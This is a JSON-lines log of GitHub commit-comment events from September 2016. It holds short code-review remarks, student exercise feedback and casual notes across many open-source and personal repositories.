{"id":"4581011719","type":"CommitCommentEvent","actor":{"login":"robertdkmarshall"},"repo":{"name":"instaclustr/zeppelin"},"payload":{"comment":{"id":19072990,"position":98,"line":334,"path":"cassandra/src/main/java/org/apache/zeppelin/cassandra/CassandraInterpreter.java","commit_id":"df82ecc8a2d181d9f92dca81357b4400a8c7ba58","created_at":"2016-09-19T01:29:42Z","updated_at":"2016-09-19T01:29:42Z","body":"yes because the withal call takes options not a builder"}},"created_at":"2016-09-19T01:29:42Z"}
{"id":"4581011977","type":"CommitCommentEvent","actor":{"login":"WonJinJu"},"repo":{"name":"WonJinJu/reactrealgrid_Slip"},"payload":{"comment":{"id":19072991,"position":null,"line":null,"path":null,"commit_id":"12f3972bb6d06de7196060fb907946bd90fef0f8","created_at":"2016-09-19T01:29:53Z","updated_at":"2016-09-19T01:29:53Z","body":"초기설정"}},"created_at":"2016-09-19T01:29:53Z"}
{"id":"4581012091","type":"CommitCommentEvent","actor":{"login":"dolanmiu"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19072992,"position":null,"line":null,"path":null,"commit_id":"4a740f23a447d7201fe655e2f016b70066752ec1","created_at":"2016-09-19T01:29:54Z","updated_at":"2016-09-19T01:29:54Z","body":"All the guides online has been using `.directives`. Was driving me insane!"}},"created_at":"2016-09-19T01:29:54Z"}
{"id":"4581012883","type":"CommitCommentEvent","actor":{"login":"w00fz"},"repo":{"name":"getgrav/grav"},"payload":{"comment":{"id":19072994,"position":5,"line":133,"path":"system/config/system.yaml","commit_id":"4f422fb2f6e59f08455746a4346e4ab35cc79a0e","created_at":"2016-09-19T01:30:19Z","updated_at":"2016-09-19T01:30:19Z","body":"Also I'll make a PR soon for review."}},"created_at":"2016-09-19T01:30:19Z"}
{"id":"4581013623","type":"CommitCommentEvent","actor":{"login":"alourie"},"repo":{"name":"instaclustr/zeppelin"},"payload":{"comment":{"id":19072997,"position":98,"line":334,"path":"cassandra/src/main/java/org/apache/zeppelin/cassandra/CassandraInterpreter.java","commit_id":"df82ecc8a2d181d9f92dca81357b4400a8c7ba58","created_at":"2016-09-19T01:30:46Z","updated_at":"2016-09-19T01:30:46Z","body":"oh...sorry, it's for the JdkSsl...missed it.\r\n\r\nAll good then."}},"created_at":"2016-09-19T01:30:46Z"}
{"id":"4581016145","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"avlahut/dsp"},"payload":{"comment":{"id":19073001,"position":null,"line":null,"path":null,"commit_id":"26f4fb74830db29bdc10d6149682b97539b84592","created_at":"2016-09-19T01:32:19Z","updated_at":"2016-09-19T01:32:19Z","body":"Hi Andrew,\r\nNice work on the python exercises 👍 . Tuples are also faster than lists and can act as constants, since they are immutable. Your code looked great, nice use of lambda functions."}},"created_at":"2016-09-19T01:32:19Z"}
{"id":"4581021499","type":"CommitCommentEvent","actor":{"login":"clement-hill"},"repo":{"name":"clement-hill/node_cms"},"payload":{"comment":{"id":19073015,"position":null,"line":null,"path":null,"commit_id":"169f8764dcb8647bad0090e596811ce8b66c5497","created_at":"2016-09-19T01:35:18Z","updated_at":"2016-09-19T01:35:18Z","body":"del"}},"created_at":"2016-09-19T01:35:18Z"}
{"id":"4581022997","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073017,"position":23,"line":23,"path":"ophidian/geometry/Models.h","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:36:05Z","updated_at":"2016-09-19T01:36:05Z","body":"Great idea!"}},"created_at":"2016-09-19T01:36:05Z"}
{"id":"4581023408","type":"CommitCommentEvent","actor":{"login":"unif2"},"repo":{"name":"unif2/dsp"},"payload":{"comment":{"id":19073018,"position":null,"line":null,"path":null,"commit_id":"2e0f5c058087cbe92609f798e1362b81995f13f2","created_at":"2016-09-19T01:36:18Z","updated_at":"2016-09-19T01:36:18Z","body":"Thanks, Gina!\n\nOn Sun, Sep 18, 2016 at 9:19 PM, Gina Soileau <notifications@github.com>\nwrote:\n\n> Hi Vince,\n> Great work with the python exercises 👍. Tuples are also faster and can\n> act as constants, which are useful. Nice work using lambda functions.\n>\n> I am including an elegant solution to the linear merge exercise:\n>\n> def linear_merge(list1, list2):\n> lst=list1+list2\n> lst.sort()\n> return lst\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/unif2/dsp/commit/2e0f5c058087cbe92609f798e1362b81995f13f2#commitcomment-19072943>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOX3WOv2XYjoGCwzlIwAn9GF9fiIYN9Vks5qreM4gaJpZM4KAEwC>\n> .\n>\n"}},"created_at":"2016-09-19T01:36:18Z"}
{"id":"4581023488","type":"CommitCommentEvent","actor":{"login":"YungLin27"},"repo":{"name":"YungLin27/Modern-Web"},"payload":{"comment":{"id":19073020,"position":null,"line":null,"path":null,"commit_id":"1cc0f3ced505bac10e5d1d6676a603d7b77d2005","created_at":"2016-09-19T01:36:21Z","updated_at":"2016-09-19T01:36:21Z","body":"modify"}},"created_at":"2016-09-19T01:36:21Z"}
{"id":"4581029548","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"zacharyacutey/TextAdventure"},"payload":{"comment":{"id":19073029,"position":null,"line":null,"path":null,"commit_id":"551678c93b1bc75bb45c1a367a594d1714b21d56","created_at":"2016-09-19T01:39:56Z","updated_at":"2016-09-19T01:39:56Z","body":"I HATE YOU GITHUB!\r\nFIX YOUR D HIGHLIGHTING!!!!!! "}},"created_at":"2016-09-19T01:39:56Z"}
{"id":"4581029671","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073030,"position":23,"line":23,"path":"ophidian/geometry/Models.h","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:40:00Z","updated_at":"2016-09-19T01:40:00Z","body":"Can you check if this works with Boxes, Lines and other kinds of geometry?"}},"created_at":"2016-09-19T01:40:00Z"}
{"id":"4581031551","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073035,"position":8,"line":13,"path":"test/CMakeLists.txt","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:41:06Z","updated_at":"2016-09-19T01:41:06Z","body":"Remember to merge development before open the pull request."}},"created_at":"2016-09-19T01:41:06Z"}
{"id":"4581034313","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"TusharShah222/dsp"},"payload":{"comment":{"id":19073045,"position":null,"line":null,"path":null,"commit_id":"419c057f824379a300f6fc5586477fdee51957de","created_at":"2016-09-19T01:42:49Z","updated_at":"2016-09-19T01:42:49Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @TusharShah222 \r\n\r\nYour work on the advanced Python problems is difficult to assess in the way it is presented. Please put the code in the files indicated and the results on the markdown page."}},"created_at":"2016-09-19T01:42:49Z"}
{"id":"4581036105","type":"CommitCommentEvent","actor":{"login":"unif2"},"repo":{"name":"unif2/dsp"},"payload":{"comment":{"id":19073050,"position":null,"line":null,"path":null,"commit_id":"2e0f5c058087cbe92609f798e1362b81995f13f2","created_at":"2016-09-19T01:43:57Z","updated_at":"2016-09-19T01:43:57Z","body":"OMG, It looks so simple!  What was I thinking?\n\nOn Sun, Sep 18, 2016 at 9:19 PM, Gina Soileau <notifications@github.com>\nwrote:\n\n> Hi Vince,\n> Great work with the python exercises 👍. Tuples are also faster and can\n> act as constants, which are useful. Nice work using lambda functions.\n>\n> I am including an elegant solution to the linear merge exercise:\n>\n> def linear_merge(list1, list2):\n> lst=list1+list2\n> lst.sort()\n> return lst\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/unif2/dsp/commit/2e0f5c058087cbe92609f798e1362b81995f13f2#commitcomment-19072943>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOX3WOv2XYjoGCwzlIwAn9GF9fiIYN9Vks5qreM4gaJpZM4KAEwC>\n> .\n>\n"}},"created_at":"2016-09-19T01:43:57Z"}
{"id":"4581037687","type":"CommitCommentEvent","actor":{"login":"wonwoongJo"},"repo":{"name":"KH-group5/finalProject"},"payload":{"comment":{"id":19073053,"position":null,"line":null,"path":null,"commit_id":"b6e5b9516deb615f08f373f32be944a94c2558a0","created_at":"2016-09-19T01:44:54Z","updated_at":"2016-09-19T01:44:54Z","body":"good"}},"created_at":"2016-09-19T01:44:54Z"}
{"id":"4581038269","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19073054,"position":526,"line":526,"path":"packager/react-packager/src/node-haste/DependencyGraph/ResolutionRequest.js","commit_id":"667aaa4621a9f59b620cb17b39af8dd309ebd0da","created_at":"2016-09-19T01:45:14Z","updated_at":"2016-09-19T01:45:14Z","body":"Why can't this just be `return path.startsWith('.')`?\r\n\r\nIs using `require('..')` discouraged?"}},"created_at":"2016-09-19T01:45:14Z"}
{"id":"4581038617","type":"CommitCommentEvent","actor":{"login":"ttruscott"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19073055,"position":null,"line":null,"path":null,"commit_id":"92f01aa2bd2b4e9644323cdbef8621682605660d","created_at":"2016-09-19T01:45:26Z","updated_at":"2016-09-19T01:45:26Z","body":"An alternative which might be more readable:\r\n\r\n                  || (mainThread->easyMovePlayed = doEasyMove) == true)"}},"created_at":"2016-09-19T01:45:26Z"}
{"id":"4581040883","type":"CommitCommentEvent","actor":{"login":"jysunhelen"},"repo":{"name":"jysunhelen/-Jingya-Sun--CCS16"},"payload":{"comment":{"id":19073056,"position":null,"line":null,"path":null,"commit_id":"294e47dcd04fb4179c889856652354c14f2b57d6","created_at":"2016-09-19T01:46:46Z","updated_at":"2016-09-19T01:46:46Z","body":"11"}},"created_at":"2016-09-19T01:46:46Z"}
{"id":"4581041733","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073060,"position":82,"line":82,"path":"test/geometry/models_test.cpp","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:47:19Z","updated_at":"2016-09-19T01:47:19Z","body":"It feels to my like ophidian::geometry::make<T> is only used for making Polygons, or am I wrong?"}},"created_at":"2016-09-19T01:47:19Z"}
{"id":"4581042010","type":"CommitCommentEvent","actor":{"login":"green-coder"},"repo":{"name":"green-coder/cdc-rs"},"payload":{"comment":{"id":19073062,"position":93,"line":93,"path":"src/rolling_hash.rs","commit_id":"22a73a353f92129113bb2784d8a2ebad075be148","created_at":"2016-09-19T01:47:28Z","updated_at":"2016-09-19T01:47:28Z","body":"This resize is not needed, we just need to make sure that the window_data has the right size from the beginning, and only reset the hash variable to zero. No need to change the window_index as well."}},"created_at":"2016-09-19T01:47:28Z"}
{"id":"4581042294","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19073064,"position":null,"line":null,"path":null,"commit_id":"419db96a175bb4090b6698dcb74a3910ad9ae7ca","created_at":"2016-09-19T01:47:39Z","updated_at":"2016-09-19T01:47:39Z","body":"this is not a simplification, but a tuning patch. please reschedule with correct `(0,4)` bounds."}},"created_at":"2016-09-19T01:47:39Z"}
{"id":"4581050815","type":"CommitCommentEvent","actor":{"login":"iPromiss1991"},"repo":{"name":"iPromiss1991/helloWorld"},"payload":{"comment":{"id":19073077,"position":null,"line":null,"path":null,"commit_id":"7c61063c7d5801a39930c613742980febed0b5c0","created_at":"2016-09-19T01:52:35Z","updated_at":"2016-09-19T01:52:35Z","body":"sdfasdfasdf"}},"created_at":"2016-09-19T01:52:35Z"}
{"id":"4581052306","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19073080,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-19T01:53:28Z","updated_at":"2016-09-19T01:53:28Z","body":"@lotem 那跟java不太一樣，java中每個函數都要try catch。\r\nconverters匿名函數放在Query函數中還是很長。不過確實清晰不少。"}},"created_at":"2016-09-19T01:53:28Z"}
{"id":"4581053479","type":"CommitCommentEvent","actor":{"login":"Jesse-Culver"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":19073084,"position":null,"line":null,"path":null,"commit_id":"9fba14a1927003a2c4adcb191299fab225a7e97c","created_at":"2016-09-19T01:54:11Z","updated_at":"2016-09-19T01:54:11Z","body":"Hey that did it!"}},"created_at":"2016-09-19T01:54:11Z"}
{"id":"4581053735","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/testbext"},"payload":{"comment":{"id":19073085,"position":null,"line":null,"path":null,"commit_id":"8de5c0ab0c9bf1a173ebc2e5dca3cbc732909fad","created_at":"2016-09-19T01:54:21Z","updated_at":"2016-09-19T01:54:21Z","body":"💨 "}},"created_at":"2016-09-19T01:54:21Z"}
{"id":"4581053972","type":"CommitCommentEvent","actor":{"login":"Mike-j-t"},"repo":{"name":"Mike-j-t/ACSCalc"},"payload":{"comment":{"id":19073087,"position":null,"line":null,"path":null,"commit_id":"42b0cc94d3fe386cecb84e5c1f573170bdab2ed8","created_at":"2016-09-19T01:54:29Z","updated_at":"2016-09-19T01:54:29Z","body":"OK to go"}},"created_at":"2016-09-19T01:54:29Z"}
{"id":"4581054422","type":"CommitCommentEvent","actor":{"login":"qiuyesuifeng"},"repo":{"name":"pingcap/docs"},"payload":{"comment":{"id":19073090,"position":null,"line":null,"path":null,"commit_id":"1e05703b3a790e364171aa062f1b6b269026e544","created_at":"2016-09-19T01:54:45Z","updated_at":"2016-09-19T01:54:45Z","body":"LGTM"}},"created_at":"2016-09-19T01:54:45Z"}
{"id":"4581057748","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"TusharShah222/dsp"},"payload":{"comment":{"id":19073094,"position":null,"line":null,"path":null,"commit_id":"db3bd653500efa1f8b41a7d21cd18a6aebeade9e","created_at":"2016-09-19T01:56:46Z","updated_at":"2016-09-19T01:56:46Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @TusharShah222 \r\n\r\nGood work with linear algebra! Here are some comments:\r\n- 2.4: `u` and `v` have the same dimensions, `1x4`, so you can compute their dot product, using for example `np.inner(u,v)`.\r\n- 2.5 asks for the norm of `u`, not its determinant. You can use `np.linalg.norm(u)` for this.\r\n- 3.8: not sure what went wrong here, but b<sup>4</sup> is equal to `[[1, -4], [0, 1]]`, and you can get this result from `b*b*b*b`.\r\n\r\n👍 \r\n"}},"created_at":"2016-09-19T01:56:46Z"}
{"id":"4581058989","type":"CommitCommentEvent","actor":{"login":"devvmh"},"repo":{"name":"mina-deploy/mina"},"payload":{"comment":{"id":19073096,"position":5,"line":42,"path":"test_env/config/deploy.rb","commit_id":"c7386689a936016e684c2ad7db3405df8fd30928","created_at":"2016-09-19T01:57:32Z","updated_at":"2016-09-19T01:57:32Z","body":"Not sure if you meant to leave this?"}},"created_at":"2016-09-19T01:57:32Z"}
{"id":"4581059213","type":"CommitCommentEvent","actor":{"login":"devvmh"},"repo":{"name":"mina-deploy/mina"},"payload":{"comment":{"id":19073097,"position":4,"line":43,"path":"lib/mina/commands.rb","commit_id":"c7386689a936016e684c2ad7db3405df8fd30928","created_at":"2016-09-19T01:57:42Z","updated_at":"2016-09-19T01:57:42Z","body":"👍 "}},"created_at":"2016-09-19T01:57:42Z"}
{"id":"4581060969","type":"CommitCommentEvent","actor":{"login":"Kaeyuz"},"repo":{"name":"Kaeyuz/test"},"payload":{"comment":{"id":19073101,"position":null,"line":null,"path":null,"commit_id":"d96d60c11bfe4ca07faf0681f78018c1ef918294","created_at":"2016-09-19T01:58:46Z","updated_at":"2016-09-19T01:58:46Z","body":"Este es el original"}},"created_at":"2016-09-19T01:58:46Z"}
{"id":"4581061612","type":"CommitCommentEvent","actor":{"login":"renannetto"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073103,"position":82,"line":82,"path":"test/geometry/models_test.cpp","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:59:09Z","updated_at":"2016-09-19T01:59:09Z","body":"It works also for Segments, Boxes and Linestrings. However those have a constructor which is easier to use than Polygon. That´s why in their tests I decided to not use ophidian::geometry::make."}},"created_at":"2016-09-19T01:59:09Z"}
{"id":"4581062213","type":"CommitCommentEvent","actor":{"login":"renannetto"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19073104,"position":8,"line":13,"path":"test/CMakeLists.txt","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T01:59:33Z","updated_at":"2016-09-19T01:59:33Z","body":"Yes, I´ll do that"}},"created_at":"2016-09-19T01:59:33Z"}
{"id":"4582370765","type":"CommitCommentEvent","actor":{"login":"sferik"},"repo":{"name":"sferik/rails_admin"},"payload":{"comment":{"id":19076241,"position":null,"line":null,"path":null,"commit_id":"b2bae25ce2c6fbaed23229a7359c13150fc6ba82","created_at":"2016-09-19T10:00:10Z","updated_at":"2016-09-19T10:00:10Z","body":"🎉🎊"}},"created_at":"2016-09-19T10:00:10Z"}
{"id":"4582372541","type":"CommitCommentEvent","actor":{"login":"Kingela"},"repo":{"name":"Kingela/hello-world"},"payload":{"comment":{"id":19076247,"position":null,"line":null,"path":null,"commit_id":"cac2a10a614bc1cf7e65b49e6e9a1887afbd5374","created_at":"2016-09-19T10:00:31Z","updated_at":"2016-09-19T10:00:31Z","body":"https://guides.github.com/activities/hello-world/"}},"created_at":"2016-09-19T10:00:31Z"}
{"id":"4582375971","type":"CommitCommentEvent","actor":{"login":"FreeCX"},"repo":{"name":"dead-pine-inc/book-of-the-idea-out"},"payload":{"comment":{"id":19076265,"position":null,"line":null,"path":null,"commit_id":"e0731720a15b5660b00e68c66a161a5c3f95f44f","created_at":"2016-09-19T10:01:14Z","updated_at":"2016-09-19T10:01:14Z","body":"поздравляю @Antoniii, где-то здесь косяк!"}},"created_at":"2016-09-19T10:01:14Z"}
{"id":"4582376619","type":"CommitCommentEvent","actor":{"login":"thecow275"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19076266,"position":null,"line":null,"path":null,"commit_id":"5b9c8dfbd26851268ae2cdaecafb255cc57d05cd","created_at":"2016-09-19T10:01:21Z","updated_at":"2016-09-19T10:01:21Z","body":"you should change depreciated to deprecated"}},"created_at":"2016-09-19T10:01:21Z"}
{"id":"4582383437","type":"CommitCommentEvent","actor":{"login":"volaya"},"repo":{"name":"arnaud-morvan/QGIS"},"payload":{"comment":{"id":19076279,"position":44,"line":401,"path":"python/plugins/processing/gui/wrappers.py","commit_id":"6ac0a80bd9f8517003cb35f1cb4a7fda2ca91095","created_at":"2016-09-19T10:02:45Z","updated_at":"2016-09-19T10:02:45Z","body":"The change looks ver good, but I dont understand this line here...\r\n\r\nOther than that, looks fine, I like this approach"}},"created_at":"2016-09-19T10:02:45Z"}
{"id":"4582383890","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076282,"position":24,"line":245,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T10:02:52Z","updated_at":"2016-09-19T10:02:52Z","body":"You could look at anchors as sort of a sub-class of buttons, whereas the anchor has more properties that the button, it can be opened in a new tab by middle-clicking, you can right-click and save, etc. But if there are no benefits from a button being a link, why should it? In my mind at least, seeking is more of an action than a page navigation.\r\nDo you see any benefits from having it as an anchor? \r\n\r\nI don't picture crawlers clicking back and forth in the video would gain them much additional info."}},"created_at":"2016-09-19T10:02:52Z"}
{"id":"4582384109","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076285,"position":6,"line":103,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"615ec67b1b78a903053a9d5e67eb760cc3f550a0","created_at":"2016-09-19T10:02:54Z","updated_at":"2016-09-19T10:02:54Z","body":"If a setting is not enabled, it can't override. If you don't do this, the inerhtiance icon will pop up on certain machiens even though the setting can't be changed. \r\nIt also optimises a bit, so it's both."}},"created_at":"2016-09-19T10:02:54Z"}
{"id":"4582384487","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"sonyxperiadev/kernel"},"payload":{"comment":{"id":19076286,"position":null,"line":null,"path":null,"commit_id":"beefc265c1c11b87529fac01a67b68c288b95894","created_at":"2016-09-19T10:02:59Z","updated_at":"2016-09-19T10:02:59Z","body":"I would appreciate it as I've recently got an e2333 and would love to build AOSP for it :)\r\n\r\nPlease let me know if you need anything from me."}},"created_at":"2016-09-19T10:02:59Z"}
{"id":"4582384823","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19076288,"position":null,"line":null,"path":null,"commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-19T10:03:05Z","updated_at":"2016-09-19T10:03:05Z","body":"I agree with all your points, we should probably keep it it as is for now and then consider creating two different functions later.\r\nWe should probably allow for more general types of arrays though, something like \r\n`function prox!{T<:Real}(f::NormL1, x::AbstractArray{T}, gamma::Float64, y::AbstractArray{T})`\r\nto allow for example sparse arrays and subarrays which should become useful.\r\nIt would aslo be nice if the scalar `NormL1{Float64}` could be treated in the same way as the vector version `NormL1` so we only need one implementation. I'm thinking about a nice way to do this, the best I came up with so far is something like\r\n```julia\r\nBase.getindex{T<:Number}(n::NormL1{T}, b)  = n.lambda\r\nBase.getindex{T<:AbstractArray}(n::NormL1{T}, b)) = n.lambda[b]\r\neltype(n::NormL1) = eltype(n.lambda)\r\n```\r\nand then writing\r\n```julia\r\nfunction prox!{T<:Real}(f::NormL1, x::AbstractArray{T}, gamma::Float64, y::AbstractArray{T})\r\n  @assert eltype(f) == T\r\n  for ...\r\n    gl = gamma*f[i]\r\n  ...\r\nend\r\n```"}},"created_at":"2016-09-19T10:03:05Z"}
{"id":"4582391091","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19076313,"position":84,"line":84,"path":"index_OLD.tpl","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T10:04:14Z","updated_at":"2016-09-19T10:04:14Z","body":"That's the index_OLD.php. I just kept it for reference."}},"created_at":"2016-09-19T10:04:14Z"}
{"id":"4582392337","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19076317,"position":13,"line":131,"path":"UM/Settings/Models/SettingDefinitionsModel.py","commit_id":"9c5afc7a76e8306b1061033e693d549da8a13130","created_at":"2016-09-19T10:04:28Z","updated_at":"2016-09-19T10:04:28Z","body":"We should also disconnect this signal after line 125."}},"created_at":"2016-09-19T10:04:28Z"}
{"id":"4582392340","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19076318,"position":4,"line":65,"path":"Documentation/AUTHORS.md","commit_id":"404db999ed892e7c5ec73ce8113e9dfd54af1c5c","created_at":"2016-09-19T10:04:28Z","updated_at":"2016-09-19T10:04:28Z","body":"@bb2020 would you mind telling me your real name and preferably also your email address so that you can be properly attributed here?"}},"created_at":"2016-09-19T10:04:28Z"}
{"id":"4582394650","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076325,"position":53,"line":53,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T10:05:00Z","updated_at":"2016-09-19T10:05:00Z","body":"Oh now I understand. Because i feel it was more explicit that i'm first gathering the stack and then using it. Performance wise it really doesn't matter. "}},"created_at":"2016-09-19T10:05:00Z"}
{"id":"4582396128","type":"CommitCommentEvent","actor":{"login":"minijerry528"},"repo":{"name":"minijerry528/Timberlake"},"payload":{"comment":{"id":19076326,"position":null,"line":null,"path":null,"commit_id":"ceba2f5bcef6e245ccba39de09d689599ef8571d","created_at":"2016-09-19T10:05:20Z","updated_at":"2016-09-19T10:05:20Z","body":"Version 0.1"}},"created_at":"2016-09-19T10:05:20Z"}
{"id":"4582400325","type":"CommitCommentEvent","actor":{"login":"suzukisan22"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076340,"position":5,"line":17,"path":"config/application.rb","commit_id":"2607979d646ba515d9f324d8c0b0ec3ef51b0892","created_at":"2016-09-19T10:06:18Z","updated_at":"2016-09-19T10:06:18Z","body":"すみません。ツイートの更新時間を表示させようとしたのですが、やめてしまいました。\r\nわかりにくいコメントを書いてしまったので、次回からわかりやすくコメントします。"}},"created_at":"2016-09-19T10:06:18Z"}
{"id":"4582401902","type":"CommitCommentEvent","actor":{"login":"orkutmuratyilmaz"},"repo":{"name":"zetaops/ulakbus"},"payload":{"comment":{"id":19076344,"position":null,"line":null,"path":null,"commit_id":"958052bdd2c712e26e18c5d9cc6f920bf26c2235","created_at":"2016-09-19T10:06:38Z","updated_at":"2016-09-19T10:06:38Z","body":"Kutlarım, dilbilgisine gösterilen özen göz dolduruyor."}},"created_at":"2016-09-19T10:06:38Z"}
{"id":"4582402035","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076345,"position":11,"line":159,"path":"resources/qml/Settings/SettingView.qml","commit_id":"132ed1d25835cdb45a4be398f1a982067ac09afe","created_at":"2016-09-19T10:06:39Z","updated_at":"2016-09-19T10:06:39Z","body":"Impossible without major refactoring. Python can't get acces to the exact same definitons model that we use there. "}},"created_at":"2016-09-19T10:06:39Z"}
{"id":"4582403685","type":"CommitCommentEvent","actor":{"login":"globin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19076349,"position":4,"line":10774,"path":"pkgs/top-level/all-packages.nix","commit_id":"5650c92b019fa8ecc1dd37ecfd77cdd72f406da7","created_at":"2016-09-19T10:07:04Z","updated_at":"2016-09-19T10:07:04Z","body":"Sorry no idea how that happened, were two commits I cherry-picked from our fork and must have missed one that changed the path :/ "}},"created_at":"2016-09-19T10:07:04Z"}
{"id":"4582404251","type":"CommitCommentEvent","actor":{"login":"nikolay1pl"},"repo":{"name":"nikolay1pl/Rep.One"},"payload":{"comment":{"id":19076350,"position":null,"line":null,"path":null,"commit_id":"a651a450771ae20532a19c37d703642407a4b62b","created_at":"2016-09-19T10:07:12Z","updated_at":"2016-09-19T10:07:12Z","body":"will work on that later."}},"created_at":"2016-09-19T10:07:12Z"}
{"id":"4582404422","type":"CommitCommentEvent","actor":{"login":"suzukisan22"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076351,"position":2,"line":2,"path":"config/routes.rb","commit_id":"88e263e4a7684d2968778baa3064eba529805554","created_at":"2016-09-19T10:07:13Z","updated_at":"2016-09-19T10:07:13Z","body":"了解しました。"}},"created_at":"2016-09-19T10:07:13Z"}
{"id":"4582408037","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076356,"position":5,"line":17,"path":"config/application.rb","commit_id":"2607979d646ba515d9f324d8c0b0ec3ef51b0892","created_at":"2016-09-19T10:08:02Z","updated_at":"2016-09-19T10:08:02Z","body":">更新時間を表示させようとしたのですが、やめてしまいました。\r\n\r\nぜひとも、挑戦を！！！"}},"created_at":"2016-09-19T10:08:02Z"}
{"id":"4582409026","type":"CommitCommentEvent","actor":{"login":"summertravel"},"repo":{"name":"JakeWharton/RxBinding"},"payload":{"comment":{"id":19076358,"position":null,"line":null,"path":null,"commit_id":"affa7a4f58e5becec4ad8b49d30f525d6ad4c2a6","created_at":"2016-09-19T10:08:15Z","updated_at":"2016-09-19T10:08:15Z","body":"dd"}},"created_at":"2016-09-19T10:08:15Z"}
{"id":"4582410076","type":"CommitCommentEvent","actor":{"login":"eljobe"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19076361,"position":49,"line":49,"path":"subprojects/core/src/main/java/org/gradle/api/internal/changedetection/state/FileDetails.java","commit_id":"c99b3e738419e8ca858ccabb3e5905d21adde3a7","created_at":"2016-09-19T10:08:31Z","updated_at":"2016-09-19T10:08:31Z","body":"What do you mean by \"root\" here? The root of the filesystem (i.e. \"/\"), the root of the gradle project (i.e. \"$rootDir\"), the root of some arbitrary file tree datastructure, or something else?"}},"created_at":"2016-09-19T10:08:31Z"}
{"id":"4582410389","type":"CommitCommentEvent","actor":{"login":"Wizzercn"},"repo":{"name":"loyalove/vue-admin"},"payload":{"comment":{"id":19076363,"position":null,"line":null,"path":null,"commit_id":"a77cb426e39d88d674e70d44924de56f4ad0c51e","created_at":"2016-09-19T10:08:35Z","updated_at":"2016-09-19T10:08:35Z","body":"添加vux干吗，又不是移动版？"}},"created_at":"2016-09-19T10:08:35Z"}
